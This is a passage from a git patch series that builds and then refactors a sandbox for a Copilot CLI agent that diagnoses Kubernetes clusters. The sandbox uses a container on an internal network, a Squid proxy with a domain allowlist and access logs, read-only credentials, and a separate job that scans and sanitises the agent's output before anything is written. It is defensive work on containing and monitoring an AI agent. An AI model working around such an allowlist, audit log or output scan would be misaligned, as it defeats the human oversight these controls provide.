https://github.com/Azure/kubelogin/releases/latest/download/kubelogin-linux-amd64.zip -o /tmp/kubelogin.zip \ + && apt-get update && apt-get install -y unzip && rm -rf /var/lib/apt/lists/* \ + && unzip /tmp/kubelogin.zip -d /tmp/kubelogin \ + && mv /tmp/kubelogin/bin/linux_amd64/kubelogin /usr/local/bin/ \ + && rm -rf /tmp/kubelogin /tmp/kubelogin.zip + +# Install Copilot CLI +RUN curl -fsSL https://gh.io/copilot-install | bash + +# Non-root user +RUN useradd -m -s /bin/bash agent +USER agent +WORKDIR /workspace + +ENTRYPOINT ["/bin/bash"] diff --git a/.github/containers/proxy/squid.conf b/.github/containers/proxy/squid.conf new file mode 100644 index 0000000..1579a9d --- /dev/null +++ b/.github/containers/proxy/squid.conf @@ -0,0 +1,43 @@ +# ────────────────────────────────────────────────────────── +# Squid proxy for agent network isolation +# +# Only domains in this allowlist are reachable from the agent +# container. Everything else is denied. +# ────────────────────────────────────────────────────────── + +# ACL: allowed domains for the cluster-doctor agent +acl allowed_domains dstdomain api.githubcopilot.com +acl allowed_domains dstdomain api.github.com +acl allowed_domains dstdomain .azmk8s.io +acl allowed_domains dstdomain login.microsoftonline.com +acl allowed_domains dstdomain management.azure.com + +# Read additional allowed domains from file (injected at runtime) +acl dynamic_domains dstdomain "/etc/squid/dynamic-domains.txt" + +# SSL bump: allow CONNECT method for HTTPS +acl SSL_ports port 443 +acl Safe_ports port 80 +acl Safe_ports port 443 +acl CONNECT method CONNECT + +# Deny non-safe ports +http_access deny !Safe_ports +http_access deny CONNECT !SSL_ports + +# Allow traffic to allowlisted domains only +http_access allow allowed_domains +http_access allow dynamic_domains + +# Deny everything else +http_access deny all + +# Proxy listens on 3128 +http_port 3128 + +# Logging (useful for debugging, can be disabled in production) +access_log stdio:/var/log/squid/access.log +cache_log stdio:/var/log/squid/cache.log + +# No caching needed +cache deny all diff --git a/.github/scripts/run-sandboxed-agent.sh b/.github/scripts/run-sandboxed-agent.sh new file mode 100755 index 0000000..6084a10 --- /dev/null +++ b/.github/scripts/run-sandboxed-agent.sh @@ -0,0 +1,136 @@ +#!/usr/bin/env bash +set -euo pipefail + +# ────────────────────────────────────────────────────────── +# Run the Copilot CLI agent inside a network-isolated container. +# +# The agent container sits on an internal Docker network with +# no direct internet access. All HTTP/HTTPS traffic is routed +# through a Squid proxy that enforces a domain allowlist. +# +# Usage: +# .github/scripts/run-sandboxed-agent.sh \ +# --kubeconfig "$HOME/.kube/config" \ +# --cluster-api-server "mycluster-dns-abc123.hcp.eastus.azmk8s.io" \ +# --prompt-file /tmp/prompt.md \ +# --output-file agent-output.json \ +# --mcp-config .copilot/mcp-config.json \ +# --copilot-token "$COPILOT_CLI_TOKEN" \ +# --github-mcp-token "$GITHUB_TOKEN" +# ────────────────────────────────────────────────────────── + +# Parse arguments +while [[ $# -gt 0 ]]; do + case $1 in + --kubeconfig) KUBECONFIG_PATH="$2"; shift 2 ;; + --cluster-api-server) CLUSTER_API="$2"; shift 2 ;; + --prompt-file) PROMPT_FILE="$2"; shift 2 ;; + --output-file) OUTPUT_FILE="$2"; shift 2 ;; + --mcp-config) MCP_CONFIG="$2"; shift 2 ;; + --copilot-token) COPILOT_TOKEN="$2"; shift 2 ;; + --github-mcp-token) GITHUB_MCP_TOKEN="$2"; shift 2 ;; + *) echo "Unknown option: $1"; exit 1 ;; + esac +done + +NETWORK_NAME="agent-net-$$" +PROXY_CONTAINER="squid-proxy-$$" +AGENT_CONTAINER="agent-$$" +SCRIPT_DIR="$(cd "$(dirname "$0")" && pwd)" +REPO_ROOT="$(cd "$SCRIPT_DIR/../.." && pwd)" + +cleanup() { + echo "Cleaning up containers and network..." + docker rm -f "$PROXY_CONTAINER" 2>/dev/null || true + docker rm -f "$AGENT_CONTAINER" 2>/dev/null || true + docker network rm "$NETWORK_NAME" 2>/dev/null || true +} +trap cleanup EXIT + +# ── Build agent image (cached after first run) ── +echo "Building agent container image..." +docker build -t cluster-doctor-agent:local \ + -f "$REPO_ROOT/.github/containers/agent/Dockerfile" \ + "$REPO_ROOT/.github/containers/agent/" \ + --quiet + +# ── Create isolated Docker network ── +# --internal: no external connectivity from this network +echo "Creating isolated network: $NETWORK_NAME" +docker network create --internal "$NETWORK_NAME" + +# ── Generate dynamic domain allowlist ── +# Add the specific cluster API server FQDN +DYNAMIC_DOMAINS=$(mktemp) +echo "$CLUSTER_API" > "$DYNAMIC_DOMAINS" +echo "Dynamic allowlist: $CLUSTER_API" + +# ── Start Squid proxy ── +# Proxy is on both the isolated network (for agent) and bridge (for internet) +echo "Starting Squid proxy..." +docker run -d \ + --name "$PROXY_CONTAINER" \ + --network "$NETWORK_NAME" \ + -v "$REPO_ROOT/.github/containers/proxy/squid.conf:/etc/squid/squid.conf:ro" \ + -v "$DYNAMIC_DOMAINS:/etc/squid/dynamic-domains.txt:ro" \ + ubuntu/squid:latest + +# Connect proxy to default bridge for internet access +docker network connect bridge "$PROXY_CONTAINER" + +# Wait for Squid to start +sleep 3 +echo "Proxy ready" + +# ── Run agent in isolated container ── +echo "Starting agent container (network-isolated, proxy-gated)..." +docker run --rm \ + --name "$AGENT_CONTAINER" \ + --network "$NETWORK_NAME" \ + -e "HTTP_PROXY=http://$PROXY_CONTAINER:3128" \ + -e "HTTPS_PROXY=http://$PROXY_CONTAINER:3128" \ + -e "NO_PROXY=localhost,127.0.0.1" \ + -e "GITHUB_TOKEN=$COPILOT_TOKEN" \ + -e "GITHUB_MCP_TOKEN=$GITHUB_MCP_TOKEN" \ + -e "KUBECONFIG=/home/agent/.kube/config" \ + -v "$KUBECONFIG_PATH:/home/agent/.kube/config:ro" \ + -v "$REPO_ROOT:/workspace:ro" \ + -v "$(dirname "$OUTPUT_FILE"):/output:rw" \ + -v "$PROMPT_FILE:/tmp/prompt.md:ro" \ + -w /workspace \ + cluster-doctor-agent:local \ + -c ' + # Start port-forward to AKS MCP server (goes through proxy to K8s API) + kubectl port-forward -n aks-mcp svc/aks-mcp 8000:8000 & + sleep 3 + + # Run the agent + copilot -p "$(cat /tmp/prompt.md)" \ + --agent "cluster-doctor" \ + --additional-mcp-config @"'"$MCP_CONFIG"'" \ + --allow-all-tools + + # Copy output to mounted volume + if [ -f agent-output.json ]; then + cp agent-output.json /output/'"$(basename "$OUTPUT_FILE")"' + fi + ' + +echo "Agent container exited" + +# Verify output +if [ -f "$OUTPUT_FILE" ]; then + echo "Agent output produced: $OUTPUT_FILE" + python3 -c "import json; json.load(open('$OUTPUT_FILE'))" || { + echo "ERROR: agent-output.json is not valid JSON" + exit 1 + } +else + echo "ERROR: Agent did not produce output" + exit 1 +fi + +# Print proxy access log for auditability +echo "" +echo "=== Proxy access log (all agent network activity) ===" +docker logs "$PROXY_CONTAINER" 2>&1 | grep -v "cache.log" || true diff --git a/.github/workflows/copilot.trigger-cluster-doctor.safe-outputs.yml b/.github/workflows/copilot.trigger-cluster-doctor.safe-outputs.yml index af91ba3..c94c4c1 100644 --- a/.github/workflows/copilot.trigger-cluster-doctor.safe-outputs.yml +++ b/.github/workflows/copilot.trigger-cluster-doctor.safe-outputs.yml @@ -1,11 +1,16 @@ name: "Cluster Doctor (Safe Outputs)" -# Three-phase pattern: -# 1. Diagnose - Agent explores cluster freely (read-only K8s + GitHub MCP) +# Three-phase pattern with network-isolated agent: +# 1. Diagnose - Agent in container, all traffic through allowlisted proxy # 2. Scan - Validate constraints, sanitize secrets, AI threat detection # 3. Apply - Deterministic write to GitHub (issues, PRs) # -# Each job has exactly one concern and the minimum permissions for it. +# Defense-in-depth layers: +# - Container isolation (agent runs in Docker, not on bare runner) +# - Network firewall (Squid proxy with domain allowlist) +# - Scoped credentials (read-only K8s RBAC, read-only Azure) +# - Safe outputs (constraint validation, secret sanitization, threat detection) +# - Permission separation (three jobs, three permission sets) # # See: https://github.com/microsoftgbb/safe-outputs-action @@ -23,12 +28,21 @@ jobs: # ────────────────────────────────────────────────────────── # Job 1: Diagnose # - # Has: Azure OIDC (read-only), K8s MCP (read-only), GitHub MCP (read-only) - # Does NOT have: GitHub write token + # Setup runs on the bare runner (Azure login, kubeconfig). + # Agent runs inside an isolated Docker container where all + # network traffic is routed through a Squid proxy enforcing + # a domain allowlist. The proxy log provides a full audit + # trail of every domain the agent contacted. # - # The agent can freely explore the cluster - check pod logs, - # inspect HPA config, trace dependency chains, etc. - # Produces a structured safe-outputs JSON artifact. + # Allowed domains: + # - api.githubcopilot.com (model API) + # - api.github.com (GitHub MCP, read-only) + # - *.azmk8s.io (K8s API server, for port-forward) + # - login.microsoftonline.com (Azure AD token exchange) + # - management.azure.com (Azure ARM, read-only) + # - (injected dynamically) + # + # Everything else is blocked at the network level. # ────────────────────────────────────────────────────────── diagnose: if: | @@ -39,7 +53,7 @@ jobs: environment: copilot runs-on: ubuntu-latest permissions: - id-token: write # Azure OIDC (scoped to read-only role) + id-token: write # Azure OIDC (scoped to read-only roles) contents: read issues: read outputs: @@ -63,6 +77,7 @@ jobs: run: | curl -fsSL https://gh.io/copilot-install | bash + # ── Parse cluster info (runs on host, needs Copilot CLI) ── - name: Parse cluster info from issue body id: cluster-info env: @@ -90,6 +105,7 @@ jobs: echo "RESOURCE_GROUP=$RESOURCE_GROUP" >> $GITHUB_OUTPUT echo "CLUSTER_NAME=$CLUSTER_NAME" >> $GITHUB_OUTPUT + # ── Setup cluster access (runs on host) ── - name: Azure CLI Login uses: azure/login@v2 with: @@ -97,90 +113,94 @@ jobs: tenant-id: ${{ secrets.ARM_TENANT_ID }} subscription-id: ${{ secrets.ARM_SUBSCRIPTION_ID }} - - name: Connect to AKS cluster + - name: Get AKS credentials and API server FQDN + id: aks run: | az aks install-cli az aks get-credentials \ --resource-group ${{ steps.cluster-info.outputs.RESOURCE_GROUP }} \ --name ${{ steps.cluster-info.outputs.CLUSTER_NAME }} \ --overwrite-existing - kubectl cluster-info - kubectl port-forward -n aks-mcp svc/aks-mcp 8000:8000 & - sleep 3 - - # ── Agent explores the cluster freely ── - # - # CAN: query K8s resources, read pod logs, check events, read issue context - # CANNOT: write to GitHub, mutate K8s, access K8s secrets, reach external networks - # - # Recommended K8s ClusterRole for the AKS MCP service account: - # pods, events, nodes, services, namespaces: get, list - # pods/log: get - # deployments, replicasets, daemonsets, statefulsets: get, list - # horizontalpodautoscalers: get, list - # NO secrets, NO configmaps (or namespace-scoped), NO write verbs - - - name: AI diagnosis + + # Extract the API server FQDN for the proxy allowlist + API_SERVER=$(kubectl config view --minify -o jsonpath='{.clusters[0].cluster.server}' | sed 's|https://||' | cut -d: -f1) + echo "api_server=$API_SERVER" >> $GITHUB_OUTPUT + echo "Cluster API server: $API_SERVER" + + - name: Post work started comment env: - GITHUB_MCP_TOKEN: ${{ secrets.GITHUB_TOKEN }} - GITHUB_TOKEN: ${{ secrets.COPILOT_CLI_TOKEN }} + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: | + gh issue comment ${{ steps.get-issue.outputs.issue_number }} \ + --body "🤖 **Cluster Doctor is on the case!** + + Connected to cluster. AI diagnosis starting in a sandboxed environment + with network-restricted access. + + 🔗 [View workflow run](${{ github.server_url }}/${{ github.repository }}/actions/runs/${{ github.run_id }})" + + # ── Generate agent prompt ── + - name: Generate diagnosis prompt run: | ISSUE_NUMBER="${{ steps.get-issue.outputs.issue_number }}" CLUSTER_NAME="${{ steps.cluster-info.outputs.CLUSTER_NAME }}" RG="${{ steps.cluster-info.outputs.RESOURCE_GROUP }}" - export PROMPT="You are the Cluster Doctor diagnosing AKS cluster '${CLUSTER_NAME}' in resource group '${RG}'. + cat > /tmp/diagnosis-prompt.md << PROMPT + You are the Cluster Doctor diagnosing AKS cluster "${CLUSTER_NAME}" in resource group "${RG}". - Use the AKS MCP server to explore the cluster. You have read-only access to all Kubernetes resources. + Use the AKS MCP server to explore the cluster. You have read-only access to Kubernetes resources. Use the GitHub MCP server to read issue #${ISSUE_NUMBER} in ${{ github.repository }} for context. INVESTIGATE FREELY: - Start broad (cluster health, node status, pod states) - - Follow threads when you find issues (e.g., OOMKilled -> check resource limits -> check HPA -> check node capacity) + - Follow threads when you find issues (OOMKilled -> resource limits -> HPA -> node capacity) - Check pod logs for crash details - - Trace the dependency chain (service -> deployment -> pods -> events) + - Trace dependency chains (service -> deployment -> pods -> events) - Look at recent events for warning patterns - When your investigation is complete, produce your findings as a JSON file at agent-output.json following this schema: + Produce your findings as a JSON file at agent-output.json: { - \"version\": \"1\", - \"actions\": [ + "version": "1", + "actions": [ { - \"type\": \"issue_comment\", - \"issue_number\": ${ISSUE_NUMBER}, - \"body\": \"## Cluster Doctor Report\n\n\" + "type": "issue_comment", + "issue_number": ${ISSUE_NUMBER}, + "body": "## Cluster Doctor Report\n\n" } ] } - If you identify config/code changes that would fix the issue, add a create_pull_request action: + For config/code fixes, add a create_pull_request action: { - \"type\": \"create_pull_request\", - \"title\": \"[cluster-doctor] \", - \"body\": \"\", - \"head\": \"cluster-doctor/fix-\", - \"files\": { \"path/to/file\": \"full file content\" } + "type": "create_pull_request", + "title": "[cluster-doctor] ", + "body": "", + "head": "cluster-doctor/fix-", + "files": { "path/to/file": "content" } } RULES: - - Write ONLY the agent-output.json file - - Do NOT include secrets, tokens, connection strings, or internal IPs in your output - - Use [cluster-doctor] prefix on all titles" + - Write ONLY agent-output.json + - Do NOT include secrets, tokens, connection strings, or internal IPs + - Use [cluster-doctor] prefix on all titles + PROMPT - copilot -p "$PROMPT" \ - --agent "cluster-doctor" \ - --additional-mcp-config @'.copilot/mcp-config.json' \ - --allow-all-tools - - if [ ! -f agent-output.json ]; then - echo "ERROR: Agent did not produce agent-output.json" - exit 1 - fi - python3 -c "import json; json.load(open('agent-output.json'))" || { - echo "ERROR: agent-output.json is not valid JSON" - exit 1 - } + # ── Run agent in sandboxed container ── + - name: Run sandboxed agent + env: + COPILOT_CLI_TOKEN: ${{ secrets.COPILOT_CLI_TOKEN }} + GITHUB_MCP_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: | + .github/scripts/run-sandboxed-agent.sh \ + --kubeconfig "$HOME/.kube/config" \ + --cluster-api-server "${{ steps.aks.outputs.api_server }}" \ + --prompt-file /tmp/diagnosis-prompt.md \ + --output-file "$GITHUB_WORKSPACE/agent-output.json" \ + --mcp-config ".copilot/mcp-config.json" \ + --copilot-token "$COPILOT_CLI_TOKEN" \ + --github-mcp-token "$GITHUB_MCP_TOKEN" - uses: actions/upload-artifact@v4 with: @@ -191,11 +211,9 @@ jobs: # ────────────────────────────────────────────────────────── # Job 2: Scan # - # Has: nothing - no cloud creds, no write tokens, no cluster access - # Just the agent's output artifact and the safe-outputs validator. - # - # Validates constraints, sanitizes secrets, runs AI threat detection. - # If anything fails, the workflow stops here - nothing gets written. + # No credentials. No cluster access. No write tokens. + # Pure validation: constraints, secret sanitization, AI threat scan. + # Acts as a circuit breaker between diagnosis and action. # ────────────────────────────────────────────────────────── scan: needs: diagnose @@ -230,7 +248,6 @@ jobs: env: GITHUB_TOKEN: ${{ secrets.COPILOT_CLI_TOKEN }} - # Re-upload the (potentially sanitized) output for the apply job - uses: actions/upload-artifact@v4 with: name: scanned-output @@ -241,11 +258,8 @@ jobs: # ────────────────────────────────────────────────────────── # Job 3: Apply # - # Has: GitHub write token (issues, contents, pull-requests) - # Does NOT have: AI agent, cloud creds, cluster access - # - # Mechanically applies the validated, sanitized output. - # No decisions made here - just execution. + # GitHub write token only. No agent. No cluster creds. + # Mechanically applies validated, sanitized output. # ────────────────────────────────────────────────────────── apply: needs: [diagnose, scan] From 205991c3f764a118a7c6327ea7b1a302abc173bf Mon Sep 17 00:00:00 2001 From: Ray Kao Date: Tue, 14 Apr 2026 20:57:31 -0400 Subject: [PATCH 5/7] refactor: domain allowlist defined in workflow YAML Moved the domain allowlist from hardcoded squid.conf to a top-level env var (AGENT_ALLOWED_DOMAINS) in the workflow YAML. The cluster API server FQDN is appended at runtime. The allowlist is now visible and editable directly in the workflow file without touching proxy configuration. squid.conf is reduced to a generic template that reads from /etc/squid/allowed-domains.txt which is generated from the YAML values at container start. Flow: YAML env -> shell variable -> temp file -> mounted into Squid Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com> --- .github/containers/proxy/squid.conf | 30 ++++++---------- .github/scripts/run-sandboxed-agent.sh | 34 ++++++++----------- ...ot.trigger-cluster-doctor.safe-outputs.yml | 22 +++++++++++- 3 files changed, 47 insertions(+), 39 deletions(-) diff --git a/.github/containers/proxy/squid.conf b/.github/containers/proxy/squid.conf index 1579a9d..bc6c5d9 100644 --- a/.github/containers/proxy/squid.conf +++ b/.github/containers/proxy/squid.conf @@ -1,43 +1,35 @@ # ────────────────────────────────────────────────────────── # Squid proxy for agent network isolation # -# Only domains in this allowlist are reachable from the agent -# container. Everything else is denied. +# Domain allowlist is injected at runtime via: +# /etc/squid/allowed-domains.txt +# +# This file is generated from the workflow YAML by the +# run-sandboxed-agent.sh script. All domain policy lives +# in the workflow, not here. # ────────────────────────────────────────────────────────── -# ACL: allowed domains for the cluster-doctor agent -acl allowed_domains dstdomain api.githubcopilot.com -acl allowed_domains dstdomain api.github.com -acl allowed_domains dstdomain .azmk8s.io -acl allowed_domains dstdomain login.microsoftonline.com -acl allowed_domains dstdomain management.azure.com - -# Read additional allowed domains from file (injected at runtime) -acl dynamic_domains dstdomain "/etc/squid/dynamic-domains.txt" +# Domain allowlist (injected at container start) +acl allowed_domains dstdomain "/etc/squid/allowed-domains.txt" -# SSL bump: allow CONNECT method for HTTPS +# Port safety acl SSL_ports port 443 acl Safe_ports port 80 acl Safe_ports port 443 acl CONNECT method CONNECT -# Deny non-safe ports http_access deny !Safe_ports http_access deny CONNECT !SSL_ports -# Allow traffic to allowlisted domains only +# Allow only allowlisted domains http_access allow allowed_domains -http_access allow dynamic_domains # Deny everything else http_access deny all -# Proxy listens on 3128 http_port 3128 -# Logging (useful for debugging, can be disabled in production) +# Audit log - every request the agent makes is recorded access_log stdio:/var/log/squid/access.log cache_log stdio:/var/log/squid/cache.log - -# No caching needed cache deny all diff --git a/.github/scripts/run-sandboxed-agent.sh b/.github/scripts/run-sandboxed-agent.sh index 6084a10..e9017ca 100755 --- a/.github/scripts/run-sandboxed-agent.sh +++ b/.github/scripts/run-sandboxed-agent.sh @@ -4,14 +4,14 @@ set -euo pipefail # ────────────────────────────────────────────────────────── # Run the Copilot CLI agent inside a network-isolated container. # -# The agent container sits on an internal Docker network with -# no direct internet access. All HTTP/HTTPS traffic is routed -# through a Squid proxy that enforces a domain allowlist. +# All HTTP/HTTPS traffic is routed through a Squid proxy that +# enforces a domain allowlist. The allowlist is passed as a +# newline-delimited string via --allowed-domains. # # Usage: # .github/scripts/run-sandboxed-agent.sh \ # --kubeconfig "$HOME/.kube/config" \ -# --cluster-api-server "mycluster-dns-abc123.hcp.eastus.azmk8s.io" \ +# --allowed-domains "$ALLOWED_DOMAINS" \ # --prompt-file /tmp/prompt.md \ # --output-file agent-output.json \ # --mcp-config .copilot/mcp-config.json \ @@ -23,7 +23,7 @@ set -euo pipefail while [[ $# -gt 0 ]]; do case $1 in --kubeconfig) KUBECONFIG_PATH="$2"; shift 2 ;; - --cluster-api-server) CLUSTER_API="$2"; shift 2 ;; + --allowed-domains) ALLOWED_DOMAINS="$2"; shift 2 ;; --prompt-file) PROMPT_FILE="$2"; shift 2 ;; --output-file) OUTPUT_FILE="$2"; shift 2 ;; --mcp-config) MCP_CONFIG="$2"; shift 2 ;; @@ -55,30 +55,29 @@ docker build -t cluster-doctor-agent:local \ --quiet # ── Create isolated Docker network ── -# --internal: no external connectivity from this network echo "Creating isolated network: $NETWORK_NAME" docker network create --internal "$NETWORK_NAME" -# ── Generate dynamic domain allowlist ── -# Add the specific cluster API server FQDN -DYNAMIC_DOMAINS=$(mktemp) -echo "$CLUSTER_API" > "$DYNAMIC_DOMAINS" -echo "Dynamic allowlist: $CLUSTER_API" +# ── Write domain allowlist to temp file ── +DOMAINS_FILE=$(mktemp) +echo "$ALLOWED_DOMAINS" | tr ',' '\n' | sed 's/^[[:space:]]*//;s/[[:space:]]*$//' | grep -v '^$' > "$DOMAINS_FILE" + +echo "Domain allowlist:" +cat "$DOMAINS_FILE" | sed 's/^/ /' +echo "" # ── Start Squid proxy ── -# Proxy is on both the isolated network (for agent) and bridge (for internet) echo "Starting Squid proxy..." docker run -d \ --name "$PROXY_CONTAINER" \ --network "$NETWORK_NAME" \ -v "$REPO_ROOT/.github/containers/proxy/squid.conf:/etc/squid/squid.conf:ro" \ - -v "$DYNAMIC_DOMAINS:/etc/squid/dynamic-domains.txt:ro" \ + -v "$DOMAINS_FILE:/etc/squid/allowed-domains.txt:ro" \ ubuntu/squid:latest -# Connect proxy to default bridge for internet access +# Proxy needs bridge access to reach the internet on behalf of the agent docker network connect bridge "$PROXY_CONTAINER" -# Wait for Squid to start sleep 3 echo "Proxy ready" @@ -100,17 +99,14 @@ docker run --rm \ -w /workspace \ cluster-doctor-agent:local \ -c ' - # Start port-forward to AKS MCP server (goes through proxy to K8s API) kubectl port-forward -n aks-mcp svc/aks-mcp 8000:8000 & sleep 3 - # Run the agent copilot -p "$(cat /tmp/prompt.md)" \ --agent "cluster-doctor" \ --additional-mcp-config @"'"$MCP_CONFIG"'" \ --allow-all-tools - # Copy output to mounted volume if [ -f agent-output.json ]; then cp agent-output.json /output/'"$(basename "$OUTPUT_FILE")"' fi @@ -130,7 +126,7 @@ else exit 1 fi -# Print proxy access log for auditability +# Full audit trail echo "" echo "=== Proxy access log (all agent network activity) ===" docker logs "$PROXY_CONTAINER" 2>&1 | grep -v "cache.log" || true diff --git a/.github/workflows/copilot.trigger-cluster-doctor.safe-outputs.yml b/.github/workflows/copilot.trigger-cluster-doctor.safe-outputs.yml index c94c4c1..48c24a2 100644 --- a/.github/workflows/copilot.trigger-cluster-doctor.safe-outputs.yml +++ b/.github/workflows/copilot.trigger-cluster-doctor.safe-outputs.yml @@ -24,6 +24,22 @@ on: permissions: contents: read +# ────────────────────────────────────────────────────────── +# Network firewall: domain allowlist for the agent container. +# The agent can ONLY reach these domains. Everything else is +# blocked by the Squid proxy at the network level. +# +# Edit this list to add/remove allowed destinations. +# The cluster API server FQDN is added dynamically at runtime. +# ────────────────────────────────────────────────────────── +env: + AGENT_ALLOWED_DOMAINS: | + api.githubcopilot.com + api.github.com + .azmk8s.io + login.microsoftonline.com + management.azure.com + jobs: # ────────────────────────────────────────────────────────── # Job 1: Diagnose @@ -193,9 +209,13 @@ jobs: COPILOT_CLI_TOKEN: ${{ secrets.COPILOT_CLI_TOKEN }} GITHUB_MCP_TOKEN: ${{ secrets.GITHUB_TOKEN }} run: | + # Append the cluster-specific API server FQDN to the allowlist + DOMAINS="${AGENT_ALLOWED_DOMAINS} + ${{ steps.aks.outputs.api_server }}" + .github/scripts/run-sandboxed-agent.sh \ --kubeconfig "$HOME/.kube/config" \ - --cluster-api-server "${{ steps.aks.outputs.api_server }}" \ + --allowed-domains "$DOMAINS" \ --prompt-file /tmp/diagnosis-prompt.md \ --output-file "$GITHUB_WORKSPACE/agent-output.json" \ --mcp-config ".copilot/mcp-config.json" \ From 81e67454dc0e7373e2e76e52641ee7d35d4d8f34 Mon Sep 17 00:00:00 2001 From: Ray Kao Date: Tue, 14 Apr 2026 21:14:37 -0400 Subject: [PATCH 6/7] refactor: use agent-sandbox-action + safe-outputs-action Replaced inline Dockerfile, Squid config, and shell script with two composable actions: - microsoftgbb/agent-sandbox-action@v1 (container + network firewall) - microsoftgbb/safe-outputs-action@v1 (validate + sanitize + apply) Removed 311 lines of infrastructure code, replaced with 76 lines of declarative action configuration. Same five security layers, now reusable across any agentic workflow. Removed: - .github/containers/agent/Dockerfile - .github/containers/proxy/squid.conf - .github/scripts/run-sandboxed-agent.sh Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com> --- .github/containers/agent/Dockerfile | 36 ---- .github/containers/proxy/squid.conf | 35 ---- .github/scripts/run-sandboxed-agent.sh | 132 ------------- ...ot.trigger-cluster-doctor.safe-outputs.yml | 184 ++++++++---------- 4 files changed, 76 insertions(+), 311 deletions(-) delete mode 100644 .github/containers/agent/Dockerfile delete mode 100644 .github/containers/proxy/squid.conf delete mode 100755 .github/scripts/run-sandboxed-agent.sh diff --git a/.github/containers/agent/Dockerfile b/.github/containers/agent/Dockerfile deleted file mode 100644 index cc00b74..0000000 --- a/.github/containers/agent/Dockerfile +++ /dev/null @@ -1,36 +0,0 @@ -FROM ubuntu:24.04 - -# Avoid interactive prompts -ENV DEBIAN_FRONTEND=noninteractive - -RUN apt-get update && apt-get install -y --no-install-recommends \ - ca-certificates \ - curl \ - jq \ - python3 \ - apt-transport-https \ - gnupg \ - && rm -rf /var/lib/apt/lists/* - -# Install kubectl -RUN curl -fsSL https://pkgs.k8s.io/core:/stable:/v1.31/deb/Release.key | gpg --dearmor -o /etc/apt/keyrings/kubernetes-apt-keyring.gpg \ - && echo 'deb [signed-by=/etc/apt/keyrings/kubernetes-apt-keyring.gpg] https://pkgs.k8s.io/core:/stable:/v1.31/deb/ /' > /etc/apt/sources.list.d/kubernetes.list \ - && apt-get update && apt-get install -y kubectl \ - && rm -rf /var/lib/apt/lists/* - -# Install kubelogin -RUN curl -fsSL https://github.com/Azure/kubelogin/releases/latest/download/kubelogin-linux-amd64.zip -o /tmp/kubelogin.zip \ - && apt-get update && apt-get install -y unzip && rm -rf /var/lib/apt/lists/* \ - && unzip /tmp/kubelogin.zip -d /tmp/kubelogin \ - && mv /tmp/kubelogin/bin/linux_amd64/kubelogin /usr/local/bin/ \ - && rm -rf /tmp/kubelogin /tmp/kubelogin.zip - -# Install Copilot CLI -RUN curl -fsSL https://gh.io/copilot-install | bash - -# Non-root user -RUN useradd -m -s /bin/bash agent -USER agent -WORKDIR /workspace - -ENTRYPOINT ["/bin/bash"] diff --git a/.github/containers/proxy/squid.conf b/.github/containers/proxy/squid.conf deleted file mode 100644 index bc6c5d9..0000000 --- a/.github/containers/proxy/squid.conf +++ /dev/null @@ -1,35 +0,0 @@ -# ────────────────────────────────────────────────────────── -# Squid proxy for agent network isolation -# -# Domain allowlist is injected at runtime via: -# /etc/squid/allowed-domains.txt -# -# This file is generated from the workflow YAML by the -# run-sandboxed-agent.sh script. All domain policy lives -# in the workflow, not here. -# ────────────────────────────────────────────────────────── - -# Domain allowlist (injected at container start) -acl allowed_domains dstdomain "/etc/squid/allowed-domains.txt" - -# Port safety -acl SSL_ports port 443 -acl Safe_ports port 80 -acl Safe_ports port 443 -acl CONNECT method CONNECT - -http_access deny !Safe_ports -http_access deny CONNECT !SSL_ports - -# Allow only allowlisted domains -http_access allow allowed_domains - -# Deny everything else -http_access deny all - -http_port 3128 - -# Audit log - every request the agent makes is recorded -access_log stdio:/var/log/squid/access.log -cache_log stdio:/var/log/squid/cache.log -cache deny all diff --git a/.github/scripts/run-sandboxed-agent.sh b/.github/scripts/run-sandboxed-agent.sh deleted file mode 100755 index e9017ca..0000000 --- a/.github/scripts/run-sandboxed-agent.sh +++ /dev/null @@ -1,132 +0,0 @@ -#!/usr/bin/env bash -set -euo pipefail - -# ────────────────────────────────────────────────────────── -# Run the Copilot CLI agent inside a network-isolated container. -# -# All HTTP/HTTPS traffic is routed through a Squid proxy that -# enforces a domain allowlist. The allowlist is passed as a -# newline-delimited string via --allowed-domains. -# -# Usage: -# .github/scripts/run-sandboxed-agent.sh \ -# --kubeconfig "$HOME/.kube/config" \ -# --allowed-domains "$ALLOWED_DOMAINS" \ -# --prompt-file /tmp/prompt.md \ -# --output-file agent-output.json \ -# --mcp-config .copilot/mcp-config.json \ -# --copilot-token "$COPILOT_CLI_TOKEN" \ -# --github-mcp-token "$GITHUB_TOKEN" -# ────────────────────────────────────────────────────────── - -# Parse arguments -while [[ $# -gt 0 ]]; do - case $1 in - --kubeconfig) KUBECONFIG_PATH="$2"; shift 2 ;; - --allowed-domains) ALLOWED_DOMAINS="$2"; shift 2 ;; - --prompt-file) PROMPT_FILE="$2"; shift 2 ;; - --output-file) OUTPUT_FILE="$2"; shift 2 ;; - --mcp-config) MCP_CONFIG="$2"; shift 2 ;; - --copilot-token) COPILOT_TOKEN="$2"; shift 2 ;; - --github-mcp-token) GITHUB_MCP_TOKEN="$2"; shift 2 ;; - *) echo "Unknown option: $1"; exit 1 ;; - esac -done - -NETWORK_NAME="agent-net-$$" -PROXY_CONTAINER="squid-proxy-$$" -AGENT_CONTAINER="agent-$$" -SCRIPT_DIR="$(cd "$(dirname "$0")" && pwd)" -REPO_ROOT="$(cd "$SCRIPT_DIR/../.." && pwd)" - -cleanup() { - echo "Cleaning up containers and network..." - docker rm -f "$PROXY_CONTAINER" 2>/dev/null || true - docker rm -f "$AGENT_CONTAINER" 2>/dev/null || true - docker network rm "$NETWORK_NAME" 2>/dev/null || true -} -trap cleanup EXIT - -# ── Build agent image (cached after first run) ── -echo "Building agent container image..." -docker build -t cluster-doctor-agent:local \ - -f "$REPO_ROOT/.github/containers/agent/Dockerfile" \ - "$REPO_ROOT/.github/containers/agent/" \ - --quiet - -# ── Create isolated Docker network ── -echo "Creating isolated network: $NETWORK_NAME" -docker network create --internal "$NETWORK_NAME" - -# ── Write domain allowlist to temp file ── -DOMAINS_FILE=$(mktemp) -echo "$ALLOWED_DOMAINS" | tr ',' '\n' | sed 's/^[[:space:]]*//;s/[[:space:]]*$//' | grep -v '^$' > "$DOMAINS_FILE" - -echo "Domain allowlist:" -cat "$DOMAINS_FILE" | sed 's/^/ /' -echo "" - -# ── Start Squid proxy ── -echo "Starting Squid proxy..." -docker run -d \ - --name "$PROXY_CONTAINER" \ - --network "$NETWORK_NAME" \ - -v 